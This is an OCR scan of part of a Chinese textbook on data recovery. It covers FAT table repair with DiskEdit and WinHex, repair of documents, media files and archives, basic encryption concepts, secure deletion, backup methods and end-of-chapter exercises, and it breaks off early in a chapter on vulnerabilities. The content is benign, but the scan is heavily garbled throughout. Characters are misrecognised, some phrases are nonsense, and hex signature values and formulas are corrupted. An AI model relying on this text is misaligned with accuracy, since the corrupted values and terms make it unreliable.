WIP MAK, WR FAT2 还 是 完整 的 ,可 以 用 FAT? f xs FATI 来 进行 恢复 ,一 般 使 用 
DiskEdit 和 WinHex 进行 。 

对 于 其 他 形式 的 破坏 ,如 格式 化 等 ,多 使 用 工具 软件 来 进行 全 盘 扫 描 , 而 较 少 采用 手工 
恢复 ,因为 一 个 分 区 有 几 兆 其 至 几 十 、 几 百 兆 个 悄 区 ,进行 手工 分 析 几 乎 是 不 可 能 的 。 当 然 ， 
对 于 个 别 极为 重要 的 数据 文件 进行 手工 恢复 也 是 可 以 的 。 

恢复 FAT 区 被 破坏 的 分 区 : 

(1) 寻找 第 二 个 FAT. 

获取 第 二 个 FAT 的 开始 三 区 与 FAT 的 长 度 。 

© 查找 特征 十 六 进 制 值 : FSFFFFOF/F8FFFFFF/FOFFFF, 

(2) 利用 FAT2 重建 FAT1。 

(D 从 BPB 参数 知 FAT 位 置 /估计 一 引导 局 区 丢失 。 

© 利用 工具 软件 寻找 游离 的 目录 项 信息 ,恢复 于 其 他 存储 介质 。 

考虑 族 的 大 小 与 开始 位 置 。 

(1) 使 用 DiskEdit 修复 FAT. 

恢复 FAT 分 区 的 DBR 之 后 ,如 FATI1 部 分 受 损 , 而 FAT2 保持 完整 (这 对 CIH 破坏 是 
最 常见 的 情况 ) ,可 以 采用 FAT? 覆盖 FATI 的 方式 进行 恢复 。 方 法 是 找到 FAT2 的 起 始 
局 区 后 开始 查找 DATA(CFATI6 则 查找 FDT) 的 起 始 扇 区 ,由 此 来 计算 FAT 表 的 长 度 , 按 
此 长 度 和 FAT2 的 起 始 届 区 推算 出 FATI1 的 起 始 悄 区 ,将 FAT2 复制 后 覆盖 损坏 的 FATI1， 
就 可 以 恢复 整个 分 区 。 

(2) 使 用 WinHex 修复 FAT。 

使 用 WinHex 恢复 FAT 的 原理 和 使 用 DiskEdit 一 样 ,在 恢复 DBR 之 后 ,采用 FAT2 
‘iit FAT 的 方式 进行 恢复 。 找 到 FAT2 后 开始 查找 DATACFATI6 则 查找 FDT) 的 起 始 
怖 区 ,这 个 分 界 非常 明显 ,因为 FAT 结束 部 分 一 定 是 一 片 0 区域 ,否则 该 分 区 就 一 点 剩余 空 
间 也 没有 了 (即使 是 这 样 ,一 般 情况 下 FAT 的 空间 在 描述 完 DATA 区 域 后 也 上 略 有 空闲 ,所 
以 最 后 一 个 扇 区 结束 的 地 方 也 一 定 是 0) ,而 DATA 区 域 或 FDT 区 域 的 开始 位 置 则 一 定 不 
是 0, 不 管 有 没有 固定 的 EDT, 系 统 都 会 从 第 二 簇 开 始 使 用 。 如 果 有 FDT, N RE FDT 
之 后 ,其 文件 登记 项 一 定 存在 ; 如 果 没 有 固定 的 EDT, 则 是 数据 区 ,也 一 定 有 数据 。 由 此 就 
可 以 计算 出 FAT 表 的 长 度 , 按 此 长 度 和 FAT2 的 起 始 扇 区 推算 出 FAT1 的 起 始 扇 区 ,将 
FAT2 复制 后 履 盖 损坏 的 FAT1, 就 可 以 恢复 整个 分 区 。 
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15.4.10 数据 的 恢复 


数据 恢复 与 系统 区 域 用 以 记录 数据 存放 扇 区 的 系统 数据 区 的 恢复 是 一 致 的 ,一 般 情 况 
下 , 效 据 区 的 数据 郡 是 不 会 被 破坏 的 ,除非 是 使 用 了 撤除 或 低级 格式 化 。 一 个 逻辑 驱动 硕 ， 
从 它 的 第 一 个 朵 区 开始 , 遭 到 了 破坏 或 部 分 损坏 ,所 以 才 有 DBR FAT 的 恢复 ,这 种 情况 与 
CIH 的 破坏 方式 相似 。 事 实 上 还 有 更 多 的 破坏 方式 ,这 些 破坏 方式 没有 任何 的 规律 性 , 表 
现 出 来 的 后 条 融 是 对 逻辑 驱动 硕 上 数据 的 破坏 是 一 种 随机 、 无 规律 的 破坏 。 这 种 情况 下 , 主 
要 是 破坏 了 FDT Al FAT 表 或 MPT 中 对 文件 或 目录 的 实际 存储 结构 的 撒 述 ,造成 系统 无 
法 确定 哪些 族 属 于 该 文件 或 目录 ,也 就 是 说 ,系统 无 法 确定 这 些 文件 或 目录 到 的 存放 在 什么 
位 置 ,从 而 表现 出 文件 或 目录 “消失 ”J 。 

一 个 逻辑 驱动 硕 往 往 有 上 兆 的 朵 区 , 束 是 一 个 很 小 的 分 区 ,也 要 一 点 一 点 手工 分 析 其 绪 
构 ,是 非常 舌 琐 的 ,这 种 情 次 下 可 以 使 用 工具 软件 来 进行 惰 复 。 这 类 工具 软件 有 很 多 ,而 且 
功能 蝇 大 ,其 原理 和 前 面 分 析 的 系统 原理 是 一 致 的 ,就 是 按照 系统 的 人 存储 原理 ,根据 可 观察 
的 信息 反 过 来 确定 记录 文件 或 目录 存储 位 置 的 FAT 或 MFT 中 的 值 ,从 而 使 系统 恢复 “ 记 
忆 ”, 找 回 丢 失 的 数据 。 

(1) 数码 存储 设备 数据 恢复 。 

CD 存储 卡 等 数码 存储 器 一 般 末 用 同人 硬盘 一 样 的 存储 原理 ,使 用 FAT 文件 系统 。 

© 其 数据 恢复 可 参考 FAT 文件 系统 的 数据 恢复 ,但 也 有 一 些 专 用 软件 , 如 
PhotoRescue, Digital Image Recovery, MediaRecover Pro、RoscuePRO。 这 些 工 具 的 好 处 是 
文 持 众多 的 数码 设备 用 到 的 文件 格式 ,如 图 形 图 像 和 视频 等 。 

(2) 光盘 数据 恢复 : 使 用 工具 软件 进行 恢复 ,如 BadCopy Pro. CDRoUer, DVDXRescue 等 。 


15.5 文档 修复 


15.5.1 文档 修复 的 定义 


(1) 文件 :通用 概念 ,相对 操作 系统 而 言 。 存 储 在 存储 介质 上 的 所 有 内 容 都 可 以 称 为 
文件 。 
(2) 文档 : 由 各 种 应 用 程序 创建 的 特定 类 型 文件 ,一 般 都 是 用 户 的 数据 文件 。 

(3) 文档 修复 : 文件 由 于 数据 逻辑 上 的 原因 ,对 于 操作 系统 可 见 , 而 相应 的 应 用 程序 无 
法 合理 ,正确 地 解释 ,从 而 出 现 诸如 “文件 损坏 无 法 打开 ”或 打开 后 为 乱码 的 情况 ,通过 纠 错 、 
重新 计算 CRC 校 验 改正 不 正确 的 格式 等 手段 ,解决 这 些 问 题 的 过 程 。 

在 数据 恢复 工作 中 ,一 种 工具 软件 没有 完全 完成 任务 ,可 以 换 另 一 种 工具 软件 重 试 ,或 
者 使 用 同一 软件 ,选择 不 同 的 选项 进行 扫描 ,一 般 部 可 以 完成 数据 恢复 任务 ,个 别 文件 恢复 
后 有 损伤 ,可 能 还 需要 进一步 进行 修复 。 


15.5.2 Windows 常见 文档 类 型 


谈 到 文档 修复 ,就 会 涉及 文档 类 型 , 即 不 同 的 应 用 程序 ,对 应 创建 不 同 格式 的 文件 ,由 操 
作 系 统 记 录 它 们 之 间 的 关联 关系 。 这 些 信息 保存 在 注册 表 中 ,所 以 在 双击 这 些 文档 时 ,系统 
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就 会 自动 运行 相应 的 应 用 程序 。 在 Windows 系统 中 ,文件 大 致 可 分 为 两 类 : 可 执行 文件 与 
非 可 执行 文件 。 

(1) 可 执行 文件 : .exe.. corn,. bat F. 

(2) 非 可 执行 文件 : 包罗 万 象 , 有 各 种 各 样 的 形式 。 

不 同文 档 类 型 需要 相应 的 修复 工具 ,它们 建立 在 擎 握 文档 内 部 格式 的 基础 之 上 ,如 同 擎 
握 了 操作 系统 管理 文件 系统 的 原理 和 方式 以 后 ,可 以 恢复 数据 一 样 ,掌握 了 文档 内 部 结构 的 
细 市 之 后 ,就 可 以 修复 相应 的 文档 。 


15.5.3 办 公文 档 修 复 


(1) 一 个 文档 打开 时 出 现 乱 码 , 第 一 步 要 做 的 工作 不 是 去 进行 修复 ,而 是 先 查 看 选择 的 
应 用 程序 是 否 正 确 , 是 不 是 该 应 用 程序 所 对 应 的 文档 或 兼容 的 文档 。 例 如 ,早期 的 WPS 
文档 与 Word 文档 是 不 能 相互 莱 容 的 。 为 外 ,虽然 Word 可 以 打开 很 多 类 型 的 文档 ,但 需 
要 安装 相应 的 转换 融 , 而 安装 程序 默认 状态 下 并 不 安装 这 些 转 换 融 ,需要 用 户 上 月 已 选择 

如 有 果 选 择 的 应 用 程序 正确 ,仍然 无 法 打开 或 打开 后 乱码 ,那么 就 有 可 能 是 文档 损坏 。 文 
档 损坏 的 原因 有 很 多 ,这 里 只 讲解 出 现 问题 后 的 处 理 方式 。 最 简单 的 方法 就 是 使 用 工具 软 
件 进 行 修 复 ,或 者 尝试 使 用 不 同 的 但 可 相互 识别 的 应 用 程序 来 打开 , 依 徘 它 们 的 转换 功能 实 
现 文档 的 修复 。 如 采 仍 不 能 修复 ,也 可 以 根据 其 格式 进行 手工 处 理 。 例 如 , WPS 格式 的 文 
件 , 出 现 问题 后 有 时 只 需 手 工 英 除 掉 文 件 涉 就 可 以 正常 打开 。 不 过 ,这 样 做 可 能 会 损失 部 分 
的 格式 信息 。 

(2) 手工 处 理 需 要 太 多 文档 格式 知识 ,主要 使 用 工具 软件 恢复 。 

(3) Word 文档 修复 。 

(D 使 用 EasyRecovery。 

D 使 用 WordRecovery. 


15.5.4 影音 文档 修复 


(1) WMV/ASF 文档 修复 : 使 用 Divx 修复 。DivX Bl AVI 电影 文档 。DivFix 可 以 观 
看 部 分 下 载 的 DivX 电影 文档 ,也 可 以 侦 测 严重 寻 致 音频 或 视频 流 错误 的 一 些 基 本 错误 。 

(2) RM 文件 修复 : 使 用 Rmfix 修复 。Rmfix 是 修复 损毁 RM 文件 的 高 效 工 具 。 
15.5.5 压缩 文档 修复 

(D Zip 文档 修复 。 如 果 是 Zip 的 上 解压 文 档 出 现 问 题 而 不 能 日 解 压 ,还 可 以 采取 修改 
其 文件 扩展 名 的 方法 进行 解决 。 例 如 ,将 “exe” 修 改 为 “zip”, 然 后 再 进行 解压 ,一 般 即 可 解 
决 问题 。 如 果 仍 然 不 能 解决 问题 ,可 以 尝试 下 面 的 专业 修复 工具 。 

(D 使 用 Advanced Zip Repairer. 

© 使 用 EasyRecovery. 

(3) fii FH ChinaZip. 

(2) RAR SPER: 高 版 本 WinRAR 本 身 对 RAR 压缩 文档 和 Zip 压缩 文档 有 修复 
能 力 。 
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15.5.6 文档 修复 的 局 限 


现在 文档 修复 工具 已 经 逐渐 发 展 起 来 ,而 且 其 使 用 操作 也 比较 侧 单 ,但 是 仍然 存在 不 
足 。 如 有 果 数 据 没 有 被 覆 关 ,那么 驶 一 定 可 以 被 恢复 ; 所 以 ,相信 随 看 技术 水 平 的 进步 ,更 多 
的 人 注意 到 这 个 问题 并 且 投 入 到 这 个 研究 领域 ,文档 修复 技术 就 一 定 能 得 到 更 快 的 发 展 , 从 
而 达到 更 高 的 技术 水 平 。 


15.6 ”数据 安全 与 数据 备份 


(1) 数据 安全 的 3 个 基本 方面 。 
(D 保密 性 (Confidentiality): 即 保证 信息 为 授权 者 享用 而 不 泄露 给 未 经 授权 考 。 
© 完整 性 (Integrity): 数据 完整 性 ,未 被 非 授权 算 改 或 损坏 ; 系统 完整 性 ,系统 未 被 非 
授权 操纵 , 按 既 定 的 功能 ,运行 完整 性 。 
© 可 用 性 (Availability): 即 保 证 信息 和 信息 系统 随时 为 授权 者 提供 服务 ,而 不 要 出 现 
韭 授 权 者 滥用 却 对 授权 者 拒绝 服务 的 情况 。 
(2) 信息 安全 扩展 要 求 。 
CD 信息 的 不 可 否认 性 : 要 求 无论 发 送 方 还 是 接收 方 都 不 能 抵赖 所 进行 的 传输 。 
Q 鉴别 : 鉴别 就 是 确认 实体 是 它 所 声明 的 ,适用 于 用 户 、 进 程 、 系 统 、 信 息 等 。 
© 审计 : 确保 实体 的 活动 可 以 被 跟 足 。 
D EPE: 特定 行为 和 结果 的 一 致 性 。 
(3) 加 密 技 术 基 础 。 
消息 被 称 为 明文 。 用 某 种 方法 伪装 消息 以 隐藏 它 的 内 容 的 过 程 称 为 加 密 , 加 了 密 的 消 
息 称 为 密 文 ,而 把 密 文 转变 为 明文 的 过 程 称 为 解密 。 明 文 用 M GI RO BK P CHH XO IS 05 
X FH C Xon, MARKS ECM) =C; 解密 函数 DCC) =M; DCE(M)) =M, 
O 密码 技术 保障 数据 安全 的 原理 : 经 典 密 码 、 现 代 密 码 技 术 ( 共 享 、 公 钥 Ln i 
O 密码 拉 术 的 应 用 。 
。 保密 。 
。 鉴别 : 内容 完整 性 与 来 源 真 实 性 。 
© 抗 否 认 : 数字 证 书 及 其 他 。 
© 对 称 加 密 。 
« 原理 : 加 密 和 解密 使 用 相同 密 钥 ; 加 密 强 度 基本 由 其 密 钥 长 度 决 定 ; 目前 一 般 至 少 
为 128 位 。 
。 主要 优 缺 点 : MIS XE BET E BRA AR. AUS. 
。 代表 算法 : DE,3DES, AES, 
D 非 对 称 加 密 。 
。 原理 : 根据 加 密 算 法 是 不 能 直接 推出 解密 算法 的 。 但 是 可 以 利用 私 钥 进 行 加 密 ,而 
公 钥 是 公开 的 ,用 来 对 私 钥 加 密 所 得 的 结案 进行 解密 。 
。 特点 : 密 钥 易于 管理 , 公 钥 不 人 被 祝 取 ; 速度 一 般 比 对 称 加 密 算 法 慢 很 多 ; 扩展 了 
加 密 技 术 在 信息 安全 中 的 应 用 ,如 身份 鉴别 、 抗 否认 。 
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。 代表 算法 : Differ-Hellman. RSA. 
15.6.1 文件 文档 保护 


文档 保护 是 文档 密码 破解 的 对 立 面 ,是 文档 的 所 有 者 为 保护 自己 的 夯 动 成 果 而 采取 的 
各 种 保护 措施 。 加 密 就 是 其 中 最 常用 的 一 种 方式 ,此 外 ,文档 保护 还 应 包括 隐藏 ,防止 删除 
等 方面 。 文 档 保护 表现 在 以 下 几 方 面 。 

(1) 使 用 相应 的 应 用 程序 对 文档 加 蜜 , 如 Word, 

由 于 这 个 问题 的 大 众 化 ,不 作 过 多 讨论 。 值 得 注意 的 是 ,在 选择 密码 时 ,用 户 应 选择 一 
种 方便 记忆 ,而 又 符合 复杂 度 要 求 的 密码 ,让 各 类 破解 程序 在 合理 的 时 间 内 无 法 完成 破解 。 
为 使 密码 具有 强 保密 性 而 难以 破解 , 它 应 该 具有 以 下 一 些 特 征 。 

(D 至 少 有 ?7 位 字符 长 。 

O 包含 数字 .大 小 与 字母 及 特殊 字符 中 的 每 一 种 类 型 。 

© 不 能 是 普通 的 单词 或 名 称 。 

(2) 使 用 Windows 2000 的 EFS 进行 文档 加 密 。 加 密 文 件 系统 透明 的 加 密 过 程 ,不 要 
求 用 户 每 次 使 用 时 都 进行 加 解密 ,但 是 对 于 非法 的 访问 行为 则 返回 拒绝 访问 的 消息 。 而 且 
它 是 基于 公共 秘 钥 的 加 密 技 术 ,难以 破解 。 另 外 ,加 密 文 件 系 统 可 以 保护 临时 文件 和 页 面 文 
件 , 有 利于 完整 的 数据 恢复 。 

(3) 使 用 第 三 方 工具 软件 进行 文档 加 密 , 如 PGP 等 。 

(4) 其 他 通过 隐藏 等 ,如 NTFS 流 化 等 手段 。 

(5) 结合 以 上 几 者 。 


15.6.2 数据 删除 安全 


数据 删除 安全 就 是 数据 删除 是 否 彻 确 , 即 数据 的 反 恢 复 问 题 。 数 据 删 际 安全 ,是 数据 局 
复 的 对 立 面 , 它 的 工作 就 是 完全 破坏 数据 ,达到 彻底 破坏 数据 恢复 可 能 性 的 目的 ,使 数据 恢 
复 无 法 进行 ,从 而 达到 保护 重要 数据 的 目的 。 所 以 ,从 前 面 讨 论 数据 恢复 工作 中 就 可 以 看 
出 ,数据 删除 安全 ,就 是 破坏 数据 恢复 的 条 件 , 要 达到 这 个 目的 ,可 以 有 多 种 手段 。 

数据 删除 安全 既 可 以 信 助 工具 软件 手动 进行 ,也 可 以 使 用 专门 的 工具 软件 来 日 动 完成 。 
使 用 专门 的 工具 软件 更 为 可 行 , 其 操作 简便 可 徘 , 效 果 也 非常 好 。 当 然 , 在 彻底 删除 之 前 一 
定 要 备份 数据 ,因为 一 旦 执行 了 该 操作 ,就 再 也 无 法 恢复 。 

数据 安全 删除 有 以 下 方法 。 

(1) 使 用 专门 工具 软件 ,如 wipout、wipinfo .Clearl Disk Security 等 。 

(2) 使 用 磁盘 编辑 软件 。 

(3) 使 用 UNIX 下 dd 等 实用 命令 。 

(4) 破坏 存储 介质 /存储 机 制 。 

数据 删除 安全 的 注意 事项 : 既然 是 数据 删 际 安 全 了 ,也 就 没有 任何 恢复 的 可 能 ,所 以 在 
使 用 前 一 定 要 做 好 备份 。 


15.6.3 数据 备份 的 定义 
数据 备份 就 是 创建 数据 的 副本 。 一 般 情 况 下 ,用 户 数据 和 重要 的 系统 数据 都 需要 备份 。 
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所 以 备份 一 般 分 为 两 个 层次 : 一 是 系统 数据 备份 ,用 以 保证 系统 正常 的 运行 ; 二 是 用 户 数 
据 备 份 , 用 于 保护 各 个 类 型 的 数据 ,防止 数据 丢失 或 破坏 。 

数据 备份 的 方法 有 很 多 种 ,可 归纳 为 自动 备份 和 手动 备份 两 大 方式 。 无 论 是 哪 一 种 备 
份 ,都 需要 对 正确 的 、 重 要 的 ,完整 的 数据 进行 备份 。 如 果 是 对 系统 的 可 徘 性 和 可 用 性 要 求 
非常 高 ,需要 保证 系统 随时 处 于 可 用 状态 ,还 需要 对 系统 进行 完整 ,合理 的 备份 ; 而 一 般 的 
个 人 用 户 , 只 需要 备份 重要 的 用 户 数 据 和 部 分 重要 的 系统 数据 即 可 。 

(1) 备份 方式 。 

CD 本 地 : 直接 备份 到 本 地 介质 。 

Q 异地 : 如 网 络 备份 。 

O 可 更 新 : 如 磁盘 、 磁 带 、 可 擦 写 光 盘 等 。 

QD 不 可 更 新 : 如 CD-R., 

@) 动态 与 静态 备份 : 前 者 使 用 备份 软件 ,后 者 手动 备份 。 

(2) 备份 方法 。 

D 操作 系统 内 建 备份 功能 或 实用 命令 ， 

Q) 使 用 专门 备份 软件 。 

(3) 数据 备份 多 版 本 还 原 要 求 。 

CD 通过 备份 软件 周期 性 备份 及 存档 时 间 要 求实 现 。 
15.6.4 数据 备份 方案 比较 

备份 文件 是 为 了 在 发 生意 外 时 能 够 及 时 进行 恢复 。 如 果 备 份 文 件 存 放 不 好 ,所 有 努力 
工作 的 成 果 都 可 能 前 功 尽 弃 。 要 避免 出 现 此 类 情况 ,最 好 的 办 法 就 是 采用 异地 备份 ,给 数据 
以 双重 保险 ,即将 文件 备份 到 与 计算 机 分 离 的 存储 介质 ,如 软盘 、 ZIP 磁盘 、 光 盘 及 存储 卡 等 
介质 上 。 下 面 介 绍 几 种 最 实用 的 异地 备份 方法 。 

CD 通过 大 容量 硬盘 备份 ,然后 再 到 异地 进行 恢复 。 

(2) 使 用 软盘 备份 数据 。 软 盘 不 仅 容 量 小 ,而 且 容 易 损 坏 ,因此 要 注意 备份 的 数据 保存 。 

(3) 使 用 网 络 硬盘 .个 人 主页 空间 等 备份 数据 。 

(4) 刻录 光盘 备份 数据 。 刻 录 光 盘 可 以 说 是 目前 常用 的 保存 数据 最 好 的 方法 之 一 。 可 
以 将 不 再 更 改 的 资料 文件 备份 到 CD-R 中 ,而 将 经 常 更 改 的 系统 备份 文件 .文档 类 文件 备份 
到 CD-RW 中 。 
15.6.5 系统 数据 的 备份 方法 

1. 使 用 Ghost 的 全 盘 备 份 

Ghost 可 以 对 分 区 或 整个 人 硬盘 进行 备份 ,备份 至 分 区 或 备份 成 镜像 文件 。 为 方便 管理 ， 
Ghost 还 提供 有 一 个 克隆 管理 天 GhostExp. exe, 通 过 它 可 以 对 Ghost 生成 的 镜像 文件 进行 
管理 。 例 如 ,浏览 镜像 文件 的 内 容 , 从 镜像 文件 中 添加 、 删 除 、. 提取、 恢复 文 件 , 甚 至 可 以 直接 
从 镜像 文件 中 运行 文件 。 

2. 使 用 “系统 还 原 ” 功 能 

在 系统 出 现 一 些 异 常 时 ,在 保护 好 系统 文件 的 前 提 下 ,“ 系 统 还 原 ” 功 能 可 以 将 系统 还 原 
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回 原来 的 一 个 正常 状态 。 而 对 于 还 原点 的 设置 ,系统 是 可 以 针对 重要 的 改变 (如 在 安装 应 用 
程序 或 驱动 程序 ) 做 出 记录 ,同时 允许 用 户 自己 设置 还 原点 。 

3. 操作 系统 的 备份 功能 

Windows 系统 提供 了 实用 的 备份 工具 。 单 击 *“ 开 始 ? 按 钮 ,然后 依次 选择 “程序 ?一 “ 附 
件 ” 一 "系统 工具 ”一 “备份 ”选项 ,就 可 以 启动 Windows 的 备份 工具 。 


15.6.6 用 户 数 据 的 备份 方法 


系统 数据 备份 中 已 经 包含 了 部 分 的 用 户 数据 备份 ,下 面 将 专门 针对 特定 的 数据 备份 进 
行 介绍 。 

对 于 用 户 数据 ,由 于 其 单纯 性 和 零碎 性 ,大 都 可 和 直接 采 用 压缩 存档 的 方式 进行 备份 ,不 
过 对 于 特定 的 数据 ,由 于 系统 存储 方式 的 不 同 ,也 需要 采取 一 定 的 相应 措施 来 完成 。 

CD 指定 个 人 文件 存放 位 置 。 为 了 安全 起 见 ,一 般 情 况 下 会 要 求 用 户 数据 与 系统 数据 进 
行 分 离 人 存储 ,这 一 方面 是 为 了 防止 系统 数据 被 破坏 , 夯 一 方面 是 为 了 方便 用 户 数据 的 管理 。 

对 于 一 些 原来 位 于 操作 系统 所 在 分 区 的 个 人 文件 夹 , 可 以 通过 更 改 系 统 设 置 的 方法 转 
移 到 其 他 磁盘 分 区 中 ,以 确保 这 些 数据 不 会 因 操作 系统 重新 安 朔 而 寺 失 。 

(2) 利用 数据 备份 工具 ,如 Second Copy、File Genie、 同 步 精 灵 、SmartSync Pro. 
15.6.7 数据 备份 注意 事项 

对 计算 机 用 户 来 说 ,备份 数据 还 不 够 ,还 有 一 个 数据 管理 , 即 效 据 维护 、 数据 更 新 的 问 
题 。 只 有 及 时 地 进行 数据 维护 及 更 新 ,才能 保证 在 计算 机 出 现 故 障 时 ,使 损失 降 到 最 低 。 因 
此 ,备份 数据 的 管理 不 仅 重 要 ,而且 必 不 可 少 。 

1. 系统 备份 

对 于 使 用 “系统 还 原 ” 功 能 的 用 户 ,由 于 系统 本 身 会 自动 创建 还 原点 ,因此 用 户 会 比较 轻 
松 ,当然 也 可 以 在 系统 配置 出 现 重大 变动 时 手动 设置 还 原点 ,这 样 对 系统 的 正常 运行 更 有 保 
障 。 对 于 使 用 Chost 软件 的 用 户 ,一 是 可 以 使 用 克隆 管理 需 GhostExp. exe 对 镜像 中 的 部 


分 内 容 进 行 及 时 的 更 新 ; 二 是 在 系统 比较 完整 .配置 基本 稳定 的 情况 下 重新 制作 镜像 文件 。 
2. 文档 备份 


对 于 文档 类 数据 ,及 时 更 新 备份 是 非常 重要 的 。 尤 其 是 重要 文档 ,最 好 同时 有 本 地 备份 
和 异地 备份 。 

(D 本 地 备份 。 这 类 数据 的 备份 ,采用 同步 软件 无 疑 是 最 佳 选择 , 建议 采 用 Second 
Copy 或 同步 精灵 。 

至 于 备份 时 间 ,建议 采用 每 天 备份 的 形式 。 让 同步 软件 自动 执行 备份 ,不 仅 保 证 了 这 些 
备份 数据 的 最 新 性 ,而 且 可 以 让 用 户 从 烦琐 的 备份 工作 中 解脱 出 来 。 

本 地 备份 要 领 如 下 。 

D 系统 备份 。 

。 保证 系统 完整 ,各 项 配置 正确 。 

。 保证 系统 没有 病毒 。 

。 进行 磁盘 碎片 整理 。 
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。 系统 配置 有 重大 变动 时 (包括 硬件 、 软 件 ) ,要 重新 制作 系统 备份 。 

Q 资料 及 文档 备份 。 

。 保证 备份 不 市 病毒 。 

。 给 备份 设置 专门 空间 ,或 者 有 明显 提示 ,保证 备份 不 被 误 删 除 。 

。 及 时 维护 和 更 新 。 

(2) 异地 备份 。 异 地 备份 最 好 的 介质 莫 过 于 刻录 光盘 和 移动 便 盘 了 。 对 于 刻录 光盘 ， 
目前 采用 CD-RW 是 最 佳 选 择 ,可 以 随时 更 新 备份 ,比较 方便 ; 如 果 采 用 CD-R. ,可 根据 实际 
情况 ,对 比较 固定 的 文档 类 数据 实施 一 次 性 刻录 ,对 经 常 变动 的 文档 类 数据 ,可 一 个 月 或 
3 个 月 甚至 半年 或 一 年 实施 一 次 刻录 。 

移动 硬盘 可 以 随时 进行 备份 及 更 新 ,这 样 做 更 有 利于 文档 类 数据 的 保存 和 管理 。 备 份 
时 间 的 安排 ,主要 由 所 备份 数据 的 重要 性 及 数据 更 新 的 快慢 等 因素 决定 。 

异地 备份 要 领 如 下 。 

CD 必须 在 进行 备份 之 前 对 系统 进行 全 面 的 杀毒 ,因为 需要 防止 备份 受到 病毒 的 感染 。 

© 对 于 软盘 ,需要 定期 地 检查 软盘 是 否 破 坏 或 直接 制作 一 个 软盘 镜像 文件 。 

© 对 于 CD-RW 光盘 ,由 于 其 兼容 性 不 是 很 好 ,因此 最 好 是 由 哪 台 刻录 机 刻录 的 盘 片 ， 
就 在 哪 台 刻录 机 上 续 刻 改写 或 读 取 。 

D 对 于 移动 便 盘 ,要 做 磁盘 检查 ,保证 其 良好 。 

此 处 所 指 的 数据 恢复 ,是 指 备份 后 的 数据 恢复 问题 。 

COD 正 营 恢复。 使 用 备份 软件 进行 的 数据 备份 ,可 以 耳 接 利用 软件 提供 的 恢复 功能 进 
行 恢 复 ; 如 果 该 软件 没有 提供 恢复 功能 ,可 以 通过 复制 手段 进行 覆 亲 恢复 。 

对 于 使 用 复制 方法 进行 的 备份 ,恢复 时 使 用 复制 手段 宪 六 即 可 。 

(2) 非 正常 恢复 。 

CD 系统 前 泪 的 情况 下 可 以 使 用 Ghost 备份 或 “系统 还 原 ”。 

D 磁盘 损坏 的 恢复 。 

C 软盘 损坏 的 情况 : 将 软盘 中 的 文件 内 容 寻 出 到 正 篆 的 软盘 。 

D 便 盘 引导 信息 损坏 : 进行 备份 ,或 者 利用 硬盘 修复 软件 进行 恢复 。 


15.7 "ku 


本 章 全 面 详 尽 地 讲述 了 数据 恢复 的 原理 和 技术 。 

首先 讲解 了 文件 系统 原理 ,详细 讲解 了 硬盘 数据 组 织 管理 和 文件 系统 原理 等 基础 知识 ， 
作为 全 书 的 理论 基础 ,这 是 十 分 必要 的 。 

其 次 讲解 了 数据 恢复 技术 ,这 是 本 章 的 中 心 内 容 , 详 细 介 绍 了 当前 典型 的 数据 恢复 技 
术 、 坏 磁道 处 理 技术 文档 修复 技术 、 密 码 遗 失 处 理 技 术 .数据 安全 与 备份 技术 ,以 及 光盘 、 软 
盘 、 数 码 存 储 设备 的 数据 恢复 技术 ,基本 涵盖 了 数据 恢复 技术 的 各 个 方面 ,对 于 数据 文件 的 
保护 和 备份 也 做 了 全 面 的 介绍 ,这 些 方法 和 工具 都 是 十 分 实用 的 , 善 用 这 些 工具 ,将 大 大 提 
高 用 户 的 数据 安全 系数 。 

最 后 为 数据 恢复 典型 实例 篇 ,通过 实例 对 各 种 典型 数据 丢失 情况 的 处 理 操作 进行 了 
SY BB 
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其 实数 据 恢复 虽然 不 是 件 简 单 的 事情 ,但 也 不 是 高 不 可 攀 的 技术 。 只 要 了 解 操 作 系 统 


的 文件 系统 结构 的 基本 原理 , 筷 握 一 些 重要 工具 的 使 用 ,加 上 细心 和 耐心 ,就 可 以 解决 绝 大 
部 分 的 数据 丢失 问题 。 


习题 15 


1. SES | ad fh FE A BE AY de 


A. 0 磁道 0 柱 面 0 AX B. 0 磁道 0 柱 面 1 IX 

C. 0 磁道 1 柱 面 1 5 D. 1 磁道 1 柱 面 1 IX 
2. 便 盘 数据 的 几 个 部 分 中 ,( ) 是 唯一 的 。 

A. MBR B. DBR C. FAT D. DATA 区 
3. TEW HIRA Fee” (Recovery Genius) 的 作用 是 ( js 

A. 硬盘 保护 卡 B. 主板 BIOS 内 置 的 系统 保护 

C. 虚拟 还 原 工 具 D. 杀毒 软件 提供 的 系统 备份 
4. 数据 恢复 的 第 一 步 一 般 是 做 ( in 

A. 分 区 恢复 B. 主 引 叶 忆 区 记录 的 恢复 

C. 文件 分 配 表 的 恢复 D. 数据 文件 的 恢复 


5. 关于 NTFS 的 元 文件 ,以 下 论述 正确 的 是 ( Ms 
A. $ MFTMirr 是 $ MFT 的 完整 映像 ,所 以 为 了 安全 可 靠 , 每 个 NTFS 分 区 ,都 有 
两 份 完 全 一 样 的 $ MET, m3 FAT 分 区 的 FAT 表 
B. $ MFTMirr 是 $ MFT 的 完整 部 分 像 
$ Boot 文件 就 是 其 DBR 
D. $ Root 是 该 分 区 中 的 根 目 录 , 是 最 高 一 级 目录 
6. 人 磁盘 一 个 刷 区 的 容量 为 ( ) 。 
A. 128B B. 256B C. 512B D. 1024B 
MBR 的 开始 标志 是 什么 , 申 哪 几 部 分 构成 ? FAT 8I NTFS 文件 系统 的 开始 标志 是 


e 


n 
什么 ? 

8. FAT 文件 系统 下 ,文件 被 完全 删除 的 特点 是 什么 ”格式 化 的 特点 是 什么 ? 

9, 一 个 客户 的 人 硬盘 的 了 D 分 区 是 FAT 文件 系统 ,打开 时 提示 “未 格式 化 ”, 用 WINHEX 
逻辑 打开 该 分 区 ,搜索 “EB 58 90? 未 果 ,搜索 "F8 FF FF 0F”, 假 设 在 1660 扇 区 处 发 现 该 标 
志 , 由 上 述 可 知 该 分 区 的 DBR fll FATI 损坏 ,FAT2 完好 ,假设 该 分 区 有 卷 标 “wxd”, 给 出 
恢复 该 分 区 的 方法 。 
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新 型 漏洞 分 析 第 16 章 


16.1 Bee TW dell ort 


PEA EER ed uz ALE) Ac J. HER DY Be Hg EER Id Se 1€ BY Pd fet 5s [8] B “hc 4 
[n] it, ,安全 环境 日 趋 复 杂 。 在 这 种 开放 复杂 的 网 络 环境 下 ,安全 着 洞 所 市 来 
的 危害 更 加 严重 。 无 论 从 国家 层面 的 网 络 安全 战略 还 是 社会 层面 的 信息 安 
全 防护 ,安全 漏洞 已 成 为 信息 对 抗 双 方 博弈 的 核心 问题 之 一 。 然 而 ,针对 具 
